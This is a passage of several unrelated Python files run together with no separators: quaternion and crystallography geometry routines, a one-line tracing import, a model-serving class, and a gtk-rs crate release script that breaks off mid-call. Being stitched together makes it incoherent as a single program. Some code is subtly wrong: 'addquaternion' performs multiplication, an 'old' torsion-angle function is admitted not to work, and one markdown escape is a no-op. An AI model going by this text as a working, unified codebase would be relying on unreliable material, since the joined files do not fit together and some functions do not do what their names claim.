2.0) ## create quaternion q = numpy.array((x, y, z, w), float) assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) return q def addquaternion(q1, q2): """Adds quaternions q1 and q2. Quaternions are typed as Numeric Python numpy.arrays of length 4. """ assert numpy.allclose(math.sqrt(numpy.dot(q1,q1)), 1.0) assert numpy.allclose(math.sqrt(numpy.dot(q2,q2)), 1.0) x1, y1, z1, w1 = q1 x2, y2, z2, w2 = q2 x = w1*x2 + x1*w2 + y1*z2 - z1*y2 y = w1*y2 + y1*w2 + z1*x2 - x1*z2 z = w1*z2 + z1*w2 + x1*y2 - y1*x2 w = w1*w2 - x1*x2 - y1*y2 - z1*z2 q = numpy.array((x, y, z, w), float) ## normalize quaternion q = q / math.sqrt(numpy.dot(q,q)) assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) return q def rmatrixquaternion(q): """Create a rotation matrix from q quaternion rotation. Quaternions are typed as Numeric Python numpy.arrays of length 4. """ assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) x, y, z, w = q xx = x*x xy = x*y xz = x*z xw = x*w yy = y*y yz = y*z yw = y*w zz = z*z zw = z*w r00 = 1.0 - 2.0 * (yy + zz) r01 = 2.0 * (xy - zw) r02 = 2.0 * (xz + yw) r10 = 2.0 * (xy + zw) r11 = 1.0 - 2.0 * (xx + zz) r12 = 2.0 * (yz - xw) r20 = 2.0 * (xz - yw) r21 = 2.0 * (yz + xw) r22 = 1.0 - 2.0 * (xx + yy) R = numpy.array([[r00, r01, r02], [r10, r11, r12], [r20, r21, r22]], float) assert numpy.allclose(numpy.linalg.det(R), 1.0) return R def quaternionrmatrix(R): """Return a quaternion calculated from the argument rotation matrix R. """ assert numpy.allclose(numpy.linalg.det(R), 1.0) t = numpy.trace(R) + 1.0 if t>1e-5: w = math.sqrt(1.0 + numpy.trace(R)) / 2.0 w4 = 4.0 * w x = (R[2,1] - R[1,2]) / w4 y = (R[0,2] - R[2,0]) / w4 z = (R[1,0] - R[0,1]) / w4 else: if R[0,0]>R[1,1] and R[0,0]>R[2,2]: S = math.sqrt(1.0 + R[0,0] - R[1,1] - R[2,2]) * 2.0 x = 0.25 * S y = (R[0,1] + R[1,0]) / S z = (R[0,2] + R[2,0]) / S w = (R[1,2] - R[2,1]) / S elif R[1,1]>R[2,2]: S = math.sqrt(1.0 + R[1,1] - R[0,0] - R[2,2]) * 2.0 x = (R[0,1] + R[1,0]) / S y = 0.25 * S z = (R[1,2] + R[2,1]) / S w = (R[0,2] - R[2,0]) / S else: S = math.sqrt(1.0 + R[2,2] - R[0,0] - R[1,1]) * 2 x = (R[0,2] + R[2,0]) / S y = (R[1,2] + R[2,1]) / S z = 0.25 * S w = (R[0,1] - R[1,0] ) / S q = numpy.array((x, y, z, w), float) assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) return q ## ## Bond Angles ## def calc_distance(a1, a2): """Returns the distance between two argument atoms. """ if a1 == None or a2 == None: return None return length(a1.position - a2.position) def calc_angle(a1, a2, a3): """Return the angle between the three argument atoms. """ if a1 == None or a2 == None or a3 == None: return None a21 = a1.position - a2.position a21 = a21 / (length(a21)) a23 = a3.position - a2.position a23 = a23 / (length(a23)) return math.acos(numpy.dot(a21, a23)) def calc_torsion_angle_old(a1, a2, a3, a4): """Calculates the torsion angle between the four argument atoms. Note: This "old" subroutine doesn't appear to do what it claims. Please see the 'new' calc_torsion_angle() function below. """ if a1 == None or a2 == None or a3 == None or a4 == None: return None a12 = a2.position - a1.position a23 = a3.position - a2.position a34 = a4.position - a3.position n12 = cross(a12, a23) n34 = cross(a23, a34) n12 = n12 / length(n12) n34 = n34 / length(n34) cross_n12_n34 = cross(n12, n34) direction = cross_n12_n34 * a23 scalar_product = numpy.dot(n12, n34) if scalar_product > 1.0: scalar_product = 1.0 if scalar_product < -1.0: scalar_product = -1.0 angle = math.acos(scalar_product) ## E.g, direction = [0.70710678, 0.0, 0.0] if direction.all() < 0.0: ## True if _all_ elements of 'direction' are true (or if 'direction' ## is empty) angle = -angle return angle def calc_torsion_angle(a1, a2, a3, a4, sqrt=math.sqrt, acos=math.acos): """Calculates the torsion angle between the four argument atoms. """ if a1 == None or a2 == None or a3 == None or a4 == None: return None v12x = a1.position[0] - a2.position[0] v12y = a1.position[1] - a2.position[1] v12z = a1.position[2] - a2.position[2] v32x = a3.position[0] - a2.position[0] v32y = a3.position[1] - a2.position[1] v32z = a3.position[2] - a2.position[2] v43x = a4.position[0] - a3.position[0] v43y = a4.position[1] - a3.position[1] v43z = a4.position[2] - a3.position[2] vn13x = v12y*v32z - v12z*v32y vn13y = v12z*v32x - v12x*v32z vn13z = v12x*v32y - v12y*v32x vn24x = v32z*v43y - v32y*v43z vn24y = v32x*v43z - v32z*v43x vn24z = v32y*v43x - v32x*v43y v12 = vn13x*vn24x + vn13y*vn24y + vn13z*vn24z v11 = vn13x**2 + vn13y**2 + vn13z**2 v22 = vn24x**2 + vn24y**2 + vn24z**2 angle = v12/sqrt(v11*v22) if angle >= 1.0: return 0.0 elif angle <= -1.0: return -180.0 else: angle = acos(angle) * Constants.RAD2DEG vtmp = vn13x * (vn24y*v32z - vn24z*v32y) + \ vn13y * (vn24z*v32x - vn24x*v32z) + \ vn13z * (vn24x*v32y - vn24y*v32x) < 0.0 if vtmp: return -angle else: return angle ## ## Atomic ADPs ## def calc_CCuij(U, V): """Calculate the correlation coefficient for anisotropic ADP tensors U and V. """ ## FIXME: Check for non-positive Uij's, 2009-08-19 invU = linalg.inverse(U) invV = linalg.inverse(V) #invU = internal_inv3x3(U) #invV = internal_inv3x3(V) det_invU = numpy.linalg.det(invU) det_invV = numpy.linalg.det(invV) return ( math.sqrt(math.sqrt(det_invU * det_invV)) / math.sqrt((1.0/8.0) * numpy.linalg.det(invU + invV)) ) def calc_Suij(U, V): """Calculate the similarity of anisotropic ADP tensors U and V. """ ## FIXME: Check for non-positive Uij's, 2009-08-19 eqU = numpy.trace(U) / 3.0 eqV = numpy.trace(V) / 3.0 isoU = eqU * numpy.identity(3, float) isoV = eqV * numpy.identity(3, float) return ( calc_CCuij(U, (eqU/eqV)*V) / (calc_CCuij(U, isoU) * calc_CCuij(V, isoV)) ) def calc_DP2uij(U, V): """Calculate the square of the volumetric difference in the probability density function of anisotropic ADP tensors U and V. """ invU = linalg.inverse(U) invV = linalg.inverse(V) det_invU = numpy.linalg.det(invU) det_invV = numpy.linalg.det(invV) Pu2 = math.sqrt( det_invU / (64.0 * Constants.PI3) ) Pv2 = math.sqrt( det_invV / (64.0 * Constants.PI3) ) Puv = math.sqrt( (det_invU * det_invV) / (8.0*Constants.PI3 * numpy.linalg.det(invU + invV))) dP2 = Pu2 + Pv2 - (2.0 * Puv) return dP2 def calc_anisotropy(U): """Calculates the anisotropy of a atomic ADP tensor U. Anisotropy is defined as the smallest eigenvalue of U divided by the largest eigenvalue of U. """ evals = linalg.eigenvalues(U) return min(evals) / max(evals) def diff_trace_UV(U, V): """Calculates the trace difference of anisotropic ADP tensors U and V. """ return abs((numpy.trace(U) - numpy.trace(V))/ 3.0) def sum_square_diff(U, V): """Calculates the sum of the differences of anisotropic ADP tensors U and V squared. """ return abs(numpy.sum(numpy.subtract(U,V)**2)) def calc_rosenfeld(a, b, d, U, V): n = numpy.array([(a[0] - b[0])/d, (a[1] - b[1])/d, (a[2] - b[2])/d]) #Un = numpy.dot(numpy.dot(n, U), numpy.transpose(n)) #Vn = numpy.dot(numpy.dot(n, V), numpy.transpose(n)) Un = internal_dot(internal_dot(n, U), numpy.transpose(n)) Vn = internal_dot(internal_dot(n, V), numpy.transpose(n)) return abs(Un - Vn) ## ## Calculations on groups of atoms ## def calc_atom_centroid(atom_iter): """Calculates the centroid of all contained Atom instances and returns a Vector to the centroid. """ num = 0 centroid = numpy.zeros(3, float) for atm in atom_iter: if atm.position != None: centroid += atm.position num += 1 return centroid / num def calc_atom_mean_temp_factor(atom_iter): """Calculates the average temperature factor of all contained Atom instances and returns the average temperature factor. """ num_tf = 0 adv_tf = 0.0 for atm in atom_iter: if atm.temp_factor != None: adv_tf += atm.temp_factor num_tf += 1 return adv_tf / num_tf def calc_inertia_tensor(atom_iter, origin): """Calculate a moment-of-inertia tensor at the given origin assuming all atoms have the same mass. """ I = numpy.zeros((3,3), float) for atm in atom_iter: x = atm.position - origin I[0,0] += x[1]**2 + x[2]**2 I[1,1] += x[0]**2 + x[2]**2 I[2,2] += x[0]**2 + x[1]**2 I[0,1] += - x[0]*x[1] I[1,0] += - x[0]*x[1] I[0,2] += - x[0]*x[2] I[2,0] += - x[0]*x[2] I[1,2] += - x[1]*x[2] I[2,1] += - x[1]*x[2] evals, evecs = linalg.eigenvectors(I) ## order the tensor such that the largest ## principal component is along the z-axis, and ## the second largest is along the y-axis if evals[0] >= evals[1] and evals[0] >= evals[2]: if evals[1] >= evals[2]: R = numpy.array((evecs[2], evecs[1], evecs[0]), float) else: R = numpy.array((evecs[1], evecs[2], evecs[0]), float) elif evals[1] >= evals[0] and evals[1] >= evals[2]: if evals[0] >= evals[2]: R = numpy.array((evecs[2], evecs[0], evecs[1]), float) else: R = numpy.array((evecs[0], evecs[2], evecs[1]), float) elif evals[2] >= evals[0] and evals[2] >= evals[1]: if evals[0] >= evals[1]: R = numpy.array((evecs[1], evecs[0], evecs[2]), float) else: R = numpy.array((evecs[0], evecs[1], evecs[2]), float) ## make sure the tensor is right-handed if numpy.allclose(numpy.linalg.det(R), -1.0): I = numpy.identity(3, float) I[0,0] = -1.0 R = numpy.dot(I, R) assert numpy.allclose(numpy.linalg.det(R), 1.0) return R # Copyright (C) 2018-2019 SignalFx, Inc. All rights reserved. from .tracing import monkeypatch_requests, SessionTracing # noqa tempo/serve/model.py from typing import Any, Callable from tempo.protocols.v2 import V2Protocol from tempo.serve.base import BaseModel from tempo.serve.metadata import BaseRuntimeOptionsType, DockerOptions, ModelFramework from tempo.serve.protocol import Protocol from tempo.serve.types import ModelDataType class Model(BaseModel): def __init__( self, name: str, protocol: Protocol = V2Protocol(), local_folder: str = None, uri: str = None, platform: ModelFramework = None, inputs: ModelDataType = None, outputs: ModelDataType = None, model_func: Callable[..., Any] = None, conda_env: str = None, runtime_options: BaseRuntimeOptionsType = DockerOptions(), description: str = "", ): """ Parameters ---------- name Name of the pipeline. Needs to be Kubernetes compliant. protocol :class:`tempo.serve.protocol.Protocol`. Defaults to KFserving V2. local_folder Location of local artifacts. uri Location of remote artifacts. platform The :class:`tempo.serve.metadata.ModelFramework` inputs The input types. outputs The output types. conda_env The conda environment name to use. If not specified will look for conda.yaml in local_folder or generate from current running environment. runtime_options The runtime options. Can be left empty and set when creating a runtime. description The description of the model """ super().__init__( name, # TODO: Should we unify names? user_func=model_func, local_folder=local_folder, uri=uri, platform=platform, inputs=inputs, outputs=outputs, conda_env=conda_env, protocol=protocol, runtime_options=runtime_options, description=description, ) #!/bin/python3 from contextlib import contextmanager # pip3 install datetime import datetime import errno import time import shutil import sys import tempfile from os import listdir, sep as os_sep from os.path import isdir, isfile, join # local imports import consts from args import Arguments, UpdateType from github import Github from globals import CRATES_VERSION, PULL_REQUESTS, SEARCH_INDEX, SEARCH_INDEX_BEFORE from globals import SEARCH_INDEX_AFTER from my_toml import TomlHandler from utils import add_to_commit, clone_repo, exec_command_and_print_error, get_features from utils import checkout_target_branch, get_file_content, write_error, write_into_file from utils import commit, commit_and_push, create_pull_request, push, revert_changes, write_msg from utils import create_tag_and_push, get_last_commit_date, merging_branches, publish_crate from utils import check_rustdoc_is_nightly, check_if_up_to_date @contextmanager def temporary_directory(): name = tempfile.mkdtemp() try: yield name finally: try: shutil.rmtree(name) except OSError as err: # if the directory has already been removed, no need to raise an error if err.errno != errno.ENOENT: raise # Doesn't handle version number containing something else than numbers and '.'! def update_version(version, update_type, section_name, place_type="section"): version_split = version.replace('"', '').split('.') if len(version_split) != 3: # houston, we've got a problem! write_error('Invalid version in {} "{}": {}'.format(place_type, section_name, version)) return None if update_type == UpdateType.MINOR: version_split[update_type] = str(int(version_split[update_type]) + 1) elif update_type == UpdateType.MEDIUM: version_split[update_type] = str(int(version_split[update_type]) + 1) version_split[UpdateType.MINOR] = '0' else: version_split[update_type] = str(int(version_split[update_type]) + 1) version_split[UpdateType.MEDIUM] = '0' version_split[UpdateType.MINOR] = '0' return '"{}"'.format('.'.join(version_split)) def check_and_update_version(entry, update_type, dependency_name, versions_update): if entry.startswith('"') or entry.startswith("'"): return update_version(entry, update_type, dependency_name, place_type="dependency") # get version and update it entry = [e.strip() for e in entry.split(',')] dic = {} for part in entry: if part.startswith('{'): part = part[1:].strip() if part.endswith('}'): part = part[:-1].strip() part = [p.strip() for p in part.split('=')] dic[part[0]] = part[1] if part[0] == 'version': old_version = part[1] new_version = update_version(old_version, update_type, dependency_name, place_type="dependency") if new_version is None: return None # Mostly for debugging, not really useful otherwise... versions_update.append({'dependency_name': dependency_name, 'old_version': old_version, 'new_version': new_version}) dic[part[0]] = '"{}"'.format(new_version) return '{{{}}}'.format(', '.join(['{} = {}'.format(entry, dic[entry]) for entry in dic])) def find_crate(crate_name): for entry in consts.CRATE_LIST: if entry['crate'] == crate_name: return True return False def update_crate_version(repo_name, crate_name, crate_dir_path, temp_dir, specified_crate): file_path = join(join(join(temp_dir, repo_name), crate_dir_path), "Cargo.toml") output = file_path.replace(temp_dir, "") if output.startswith('/'): output = output[1:] write_msg('=> Updating crate versions for {}'.format(file_path)) content = get_file_content(file_path) if content is None: return False toml = TomlHandler(content) for section in toml.sections: if section.name == 'package': section.set('version', CRATES_VERSION[crate_name]) elif specified_crate is not None: continue elif section.name.startswith('dependencies.') and find_crate(section.name[13:]): if specified_crate is None and section.name[13:] not in CRATES_VERSION: input('"{}" dependency not found in versions for crate "{}"...' .format(section.name[13:], crate_name)) continue section.set('version', CRATES_VERSION[section.name[13:]]) elif section.name == 'dependencies': for entry in section.entries: if find_crate(entry['key']): section.set(entry['key'], CRATES_VERSION[entry['key']]) result = write_into_file(file_path, str(toml)) write_msg('=> {}: {}'.format(output.split(os_sep)[-2], 'Failure' if result is False else 'Success')) return result def update_repo_version(repo_name, crate_name, crate_dir_path, temp_dir, update_type, no_update): # pylint: disable=too-many-branches,too-many-locals file_path = join(join(join(temp_dir, repo_name), crate_dir_path), "Cargo.toml") output = file_path.replace(temp_dir, "") if output.startswith('/'): output = output[1:] write_msg('=> Updating versions for {}'.format(file_path)) content = get_file_content(file_path) if content is None: return False toml = TomlHandler(content) versions_update = [] for section in toml.sections: if (section.name == 'package' or (section.name.startswith('dependencies.') and find_crate(section.name[13:]))): version = section.get('version', None) if version is None: continue new_version = None if no_update is False: new_version = update_version(version, update_type, section.name) else: new_version = version if new_version is None: return False # Print the status directly if it's the crate's version. if section.name == 'package': write_msg('\t{}: {} => {}'.format(output.split(os_sep)[-2], version, new_version)) CRATES_VERSION[crate_name] = new_version else: # Otherwise add it to the list to print later. versions_update.append({'dependency_name': section.name[13:], 'old_version': version, 'new_version': new_version}) section.set('version', new_version) elif section.name == 'dependencies': for entry in section.entries: if find_crate(entry): new_version = check_and_update_version(section.entries[entry], update_type, entry, []) section.set(entry, new_version) for update in versions_update: write_msg('\t{}: {} => {}'.format(update['dependency_name'], update['old_version'], update['new_version'])) out = str(toml) if not out.endswith("\n"): out += '\n' result = True if no_update is False: # We only write into the file if we're not just getting the crates version. result = write_into_file(file_path, out) write_msg('=> {}: {}'.format(output.split(os_sep)[-2], 'Failure' if result is False else 'Success')) return result def update_badges(repo_name, temp_dir, specified_crate): path = join(join(temp_dir, repo_name), "_data/crates.json") content = get_file_content(path) current = None out = [] for line in content.split("\n"): if line.strip().startswith('"name": "'): current = line.split('"name": "')[-1].replace('",', '') if specified_crate is not None and current != specified_crate: current = None elif line.strip().startswith('"max_version": "') and current is not None: version = line.split('"max_version": "')[-1].replace('"', '').replace(',', '') out.append(line.replace('": "{}"'.format(version), '": {}'.format(CRATES_VERSION[current])) + '\n') current = None continue out.append(line + '\n') return write_into_file(path, ''.join(out).replace('\n\n', '\n')) def cleanup_doc_repo(temp_dir): path = join(temp_dir, consts.DOC_REPO) dirs = ' '.join(['"{}"'.format(join(path, f)) for f in listdir(path) if isdir(join(path, f)) and f.startswith('.') is False]) command = ['bash', '-c', 'cd {} && rm -rf {}'.format(path, dirs)] if not exec_command_and_print_error(command): input("Couldn't clean up docs! Try to fix it and then press ENTER to continue...") def build_docs(repo_name, temp_dir, extra_path, crate_name): # pylint: disable=too-many-locals path = join(join(temp_dir, repo_name), extra_path) features = get_features(join(path, 'Cargo.toml')) # We can't add "--no-deps" argument to cargo doc, otherwise we lose links to items of # other crates... # # Also, we run "cargo update" in case the lgpl-docs repository has been updated (so we get the # last version). command = ['bash', '-c', ('cd {} && cargo update && cargo rustdoc --no-default-features ' '--features "{}"').format(path, features)] if not exec_command_and_print_error(command): input("Couldn't generate docs! Try to fix it and then press ENTER to continue...") doc_folder = join(path, 'target/doc') try: file_list = ' '.join(['"{}"'.format(f) for f in listdir(doc_folder) if isfile(join(doc_folder, f))]) except Exception as err: write_error('Error occured in build docs: {}'.format(err)) input("It seems like the \"{}\" folder doesn't exist. Try to fix it then press ENTER..." .format(doc_folder)) # Copy documentation files command = ['bash', '-c', 'cd {} && cp -r "{}" {} "{}"' .format(doc_folder, crate_name.replace('-', '_'), file_list, join(temp_dir, consts.DOC_REPO))] if not exec_command_and_print_error(command): input("Couldn't copy docs! Try to fix it and then press ENTER to continue...") # Copy source files destination = "{}/src".format(join(temp_dir, consts.DOC_REPO)) command = ['bash', '-c', 'cd {0} && mkdir -p "{1}" && cp -r "src/{2}" "{1}/"' .format(doc_folder, destination, crate_name.replace('-', '_'))] if not exec_command_and_print_error(command): input("Couldn't copy doc source files! Try to fix it and then press ENTER to continue...") search_index = join(path, 'target/doc/search-index.js') lines = get_file_content(search_index).split('\n') before = True fill_extras = len(SEARCH_INDEX_BEFORE) == 0 found = False for line in lines: if line.startswith('searchIndex['): before = False # We need to be careful in here if we're in a sys repository (which should never be the # case!). if line.startswith('searchIndex["{}"]'.format(crate_name.replace('-', '_'))): SEARCH_INDEX.append(line) found = True elif fill_extras is True: if before is True: SEARCH_INDEX_BEFORE.append(line) else: SEARCH_INDEX_AFTER.append(line) if found is False: input("Couldn't find \"{}\" in `{}`!\nTry to fix it and then press ENTER to continue..." .format(crate_name.replace('-', '_'), search_index)) def end_docs_build(temp_dir): path = join(temp_dir, consts.DOC_REPO) revert_changes(consts.DOC_REPO, temp_dir, ['COPYRIGHT.txt', 'LICENSE-APACHE.txt', 'LICENSE-MIT.txt']) try: with open(join(path, 'search-index.js'), 'w') as file: file.write('\n'.join(SEARCH_INDEX_BEFORE)) file.write('\n'.join(SEARCH_INDEX)) file.write('\n'.join(SEARCH_INDEX_AFTER)) command = ['bash', '-c', 'cd minifier && cargo run --release -- "{}"'.format(path)] if not exec_command_and_print_error(command): input("Couldn't run minifier! Try to fix it and then press ENTER to continue...") add_to_commit(consts.DOC_REPO, temp_dir, ['.']) except Exception as err: write_error('An exception occured in "end_docs_build": {}'.format(err)) input("Press ENTER to continue...") input('If you want to prevent "{}" to be updated, now is the good time! Press ENTER to ' 'continue...'.format(join(path, "main.js"))) def write_merged_prs(merged_prs, contributors, repo_url): content = '' for merged_pr in reversed(merged_prs): if merged_pr.title.startswith('[release] '): continue if merged_pr.author not in contributors: contributors.append(merged_pr.author) md_content = (merged_pr.title.replace('<', '<') .replace('>', '>') .replace('[', '\\[') .replace(']', '\\]') .replace('*', '\\*') .replace('_', '\\_')) content += ' * [{}]({}/pull/{})\n'.format(md_content, repo_url, merged_pr.number) return content + '\n' def build_blog_post(repositories, temp_dir, token): # pylint: disable=too-many-locals write_msg('=> Building blog post...') content = '''--- layout: post author: {} title: {} categories: [front, crates] date: {} --- * Write intro here * ### Changes For the interested ones, here is the list of the merged pull requests: '''.format(input('Enter author name: '), input('Enter title: '), time.strftime("%Y-%m-%d %H:00:00 +0000")) contributors = [] git = Github(token) oldest_date = None for repo in repositories: checkout_target_branch(repo, temp_dir, "crate") success, out, err = get_last_commit_date(repo, temp_dir) if not success: write_msg("Couldn't get PRs for '{}': {}".format(repo, err)) continue max_date = datetime.date.fromtimestamp(int(out)) if oldest_date is None or max_date < oldest_date: oldest_date = max_date write_msg("Gettings merged PRs from {}...".format(repo)) merged_prs = git.get_pulls(repo, consts.ORGANIZATION, 'closed', max_date, only_merged=True) write_msg("=> Got {} merged PRs".format(len(merged_prs))) if len(merged_prs) < 1: continue repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, repo) content += '[{}]({}):\n\n'.format(repo, repo_url) content += write_merged_prs(merged_prs, contributors, repo_url) write_msg("Gettings merged PRs from gir...") merged_prs = git.get_pulls('gir', consts.ORGANIZATION, 'closed', oldest_date, only_merged=True) write_msg("=> Got {} merged PRs".format(len(merged_prs))) if len(merged_prs) > 0: repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, 'gir') content += ('All this was possible thanks to the [gtk-rs/gir]({}) project as well:\n\n' .format(repo_url)) content += write_merged_prs(merged_prs, contributors, repo_url) content += 'Thanks to all of our contributors for their (awesome!) work on this release:\n\n' # Sort contributors list alphabetically with case insensitive. contributors = sorted(contributors, key=lambda s: s.casefold()) content += '\n'.join([' * [@{}]({}/{})'.format(contributor, consts.GITHUB_URL, contributor) for contributor in contributors]) content += '\n' file_name = join(join(temp_dir, consts.BLOG_REPO), '_posts/{}-new-release.md'.format(time.strftime("%Y-%m-%d"))) try: with open(file_name, 'w') as outfile: outfile.write(content) write_msg('New blog post written into "{}".'.format(file_name)) add_to_commit(consts.BLOG_REPO, temp_dir, [file_name]) commit(consts.BLOG_REPO, temp_dir, "Add new blog post") except Exception as err: write_error('build_blog_post failed: {}'.format(err)) write_msg('\n=> Here is the blog post content:\n{}\n<='.format(content)) write_msg('Done!') def generate_new_tag(repository, temp_dir, specified_crate, args): # We make a new tag for every crate: # # * If it is a "sys" crate, then we add its name to the tag # * If not, then we just keep its version number for crate in args.crates: crate = crate['crate'] if crate['repository'] == repository: if specified_crate is not None and crate['crate'] != specified_crate: continue tag_name = CRATES_VERSION[crate['crate']] if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'): tag_name = '{}-{}'.format(crate['crate'], tag_name) write_msg('==> Creating new tag "{}" for repository "{}"...'.format(tag_name, repository)) create_tag_and_push(tag_name, repository, temp_dir) def generate_new_branches(repository, temp_dir, specified_crate, args): # We make a new branch for every crate based on the current "crate" branch: # # * If it is a "sys" crate, then we ignore it. # * If not, then we create a new branch for crate in args.crates: crate = crate['crate'] if crate['repository'] == repository: if specified_crate is not None and crate['crate'] != specified_crate: continue if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'): continue branch_name = CRATES_VERSION[crate['crate']] write_msg('==> Creating new branch "{}" for repository "{}"...'.format(branch_name, repository)) push(repository, temp_dir, branch_name) def update_doc_content_repository(repositories, temp_dir, token, no_push, args): if clone_repo(consts.DOC_CONTENT_REPO, temp_dir) is False: input('Try to fix the problem then press ENTER to continue...') write_msg("Done!") repo_path = join(temp_dir, consts.DOC_CONTENT_REPO) write_msg("=> Generating documentation for crates...") for repo in repositories: current = None for crate in args.crates: crate = crate['crate'] if crate['repository'] == repo: current = crate break if current is None: input('No repository matches "{}", something is weird. (Press ENTER TO CONTINUE)') continue if current.get("doc", True) is False: continue write_msg('==> Generating documentation for "{}"'.format(current)) path = join(temp_dir, current['repository']) command = ['bash', '-c', 'cd {} && make doc && mv vendor.md {}'.format(path, join(repo_path, current['crate']))] if not exec_command_and_print_error(command): input("Fix the error and then press ENTER") write_msg('Done!') write_msg('Committing "{}" changes...'.format(consts.DOC_CONTENT_REPO)) commit(consts.DOC_CONTENT_REPO, temp_dir, "Update vendor files") if no_push is False: push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH) # We always make minor releases in here, no need for a more important one considering we don't # change the API. if update_repo_version(consts.DOC_CONTENT_REPO, consts.DOC_CONTENT_REPO, "", temp_dir, UpdateType.MINOR, False) is False: write_error('The update for the "{}" crate failed...'.format(consts.DOC_CONTENT_REPO)) input('Fix the error and then press ENTER') commit(consts.DOC_CONTENT_REPO, temp_dir, "Update version") if no_push is False: push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH) create_pull_request(consts.DOC_CONTENT_REPO, consts.MASTER_TMP_BRANCH, "master", token, False) input(('All done with the "{}" update: please merge the PR then press ENTER so the ' 'publication can performed...').format(consts.DOC_CONTENT_REPO)) publish_crate(consts.DOC_CONTENT_REPO, "", temp_dir, consts.DOC_CONTENT_REPO, checkout_branch='master') write_msg('Ok all done! We can move forward now!') else: write_msg(('All with "{}", you still need to publish a new version if you want the changes ' 'to be taken into account').format(consts.DOC_CONTENT_REPO)) def clone_repositories(args, temp_dir): write_msg('=> Cloning the repositories...') repositories = [] for crate in args.crates: crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue if crate["repository"] not in repositories: repositories.append(crate["repository"]) if clone_repo(crate["repository"], temp_dir) is False: write_error('Cannot clone the "{}" repository...'.format(crate["repository"])) return [] if len(repositories) < 1: write_msg('No crate "{}" found. Aborting...'.format(args.specified_crate)) return [] if args.doc_only is False: if clone_repo(consts.BLOG_REPO, temp_dir, depth=1) is False: write_error('Cannot clone the "{}" repository...'.format(consts.BLOG_REPO)) return [] if clone_repo(consts.DOC_REPO, temp_dir, depth=1) is False: write_error('Cannot clone the "{}" repository...'.format(consts.DOC_REPO)) return [] write_msg('Done!') return repositories def update_crates_versions(args, temp_dir, repositories): write_msg('=> Updating [master] crates version...') for crate in args.crates: update_type = crate['up-type'] crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue if update_repo_version(crate["repository"], crate["crate"], crate["path"], temp_dir, update_type, args.badges_only or args.tags_only) is False: write_error('The update for the "{}" crate failed...'.format(crate["crate"])) return False write_msg('Done!') if args.badges_only is False and args.tags_only is False: write_msg('=> Committing{} to the "{}" branch...' .format(" and pushing" if args.no_push is False else "", consts.MASTER_TMP_BRANCH)) for repo in repositories: commit(repo, temp_dir, "Update versions [ci skip]") if args.no_push is False: push(repo, temp_dir, consts.MASTER_TMP_BRANCH) write_msg('Done!') if args.no_push is False: write_msg('=> Creating PRs on master branch...') for repo in repositories: create_pull_request(repo, consts.MASTER_TMP_BRANCH, "master", args.token) write_msg('Done!') return True def update_crate_repositories_branches(args, temp_dir, repositories): write_msg('=> Merging "master" branches into "crate" branches...') for repo in repositories: merging_branches(repo, temp_dir, "master") write_msg('Done!') write_msg('=> Updating [crate] crates version...') for crate in args.crates: crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue if update_crate_version(crate["repository"], crate["crate"], crate["path"], temp_dir, args.specified_crate) is False: write_error('The update for the "{}" crate failed...'.format(crate["crate"])) return False write_msg('Done!') write_msg('=> Committing{} to the "{}" branch...' .format(" and pushing" if args.no_push is False else "", consts.CRATE_TMP_BRANCH)) for repo in repositories: commit(repo, temp_dir, "Update versions [ci skip]") if args.no_push is False: push(repo, temp_dir, consts.CRATE_TMP_BRANCH) write_msg('Done!') if args.no_push is False: write_msg('=> Creating PRs on crate branch...') for repo in repositories: create_pull_request(repo, consts.CRATE_TMP_BRANCH, "crate", args.token) write_msg('Done!') return True def publish_crates(args, temp_dir): write_msg('+++++++++++++++') write_msg('++ IMPORTANT ++') write_msg('+++++++++++++++') write_msg('Almost everything has been done. Take a deep breath, check for opened ' 'pull requests and once done, we can move forward!') write_msg("\n{}\n".format('\n'.join(PULL_REQUESTS))) PULL_REQUESTS.append('=============') input('Press ENTER to continue...') write_msg('=> Publishing crates...') for crate in args.crates: crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue publish_crate(crate["repository"], crate["path"], temp_dir, crate['crate']) write_msg('Done!') def create_example_repository_pull_request(args): write_msg('=> Creating PR for examples repository') create_pull_request("examples", "pending", "master", args.token) write_msg('Done!') def generate_tags_and_version_branches(args, temp_dir, repositories): if args.no_push is True or args.doc_only is True or args.badges_only is True: return write_msg("=> Generating tags and branches...") for repo in repositories: generate_new_tag(repo, temp_dir, args.specified_crate, args) generate_new_branches(repo, temp_dir, args.specified_crate, args) write_msg('Done!') def regenerate_documentation(args, temp_dir, repositories): if args.badges_only is True or args.tags_only is True: return input("About to regenerate documentation. Are you sure you want to continue? " + "(Press ENTER to continue)") update_doc_content_repository(repositories, temp_dir, args.token, args.no_push, args) write_msg('=> Preparing doc repo (too much dark magic in here urg)...') cleanup_doc_repo(temp_dir) write_msg('Done!') write_msg('=> Building docs...') for crate in args.crates: crate = crate['crate'] if crate['crate'] == 'gtk-test': continue write_msg('-> Building docs for {}...'.format(crate['crate'])) build_docs(crate['repository'], temp_dir, crate['path'], crate.get('doc_name', crate['crate'])) end_docs_build(temp_dir) write_msg('Done!') write_msg('=> Committing{} docs to the "{}" branch...' .format(" and pushing" if args.no_push is False else "", consts.CRATE_TMP_BRANCH)) commit(consts.DOC_REPO, temp_dir, "Regen docs") if args.no_push is False: push(consts.DOC_REPO, temp_dir, consts.CRATE_TMP_BRANCH) create_pull_request( consts.DOC_REPO, consts.CRATE_TMP_BRANCH, "gh-pages", args.token) write_msg("New pull request(s):\n\n{}\n".format('\n'.join(PULL_REQUESTS))) write_msg('Done!') def update_gtk_rs_blog(args, temp_dir): if args.doc_only is True or args.tags_only is True: return write_msg('=> Updating blog...') if update_badges(consts.BLOG_REPO, temp_dir, args.specified_crate) is False: write_error("Error when trying to update badges...") elif args.no_push is False: commit_and_push(consts.BLOG_REPO, temp_dir, "Update versions", 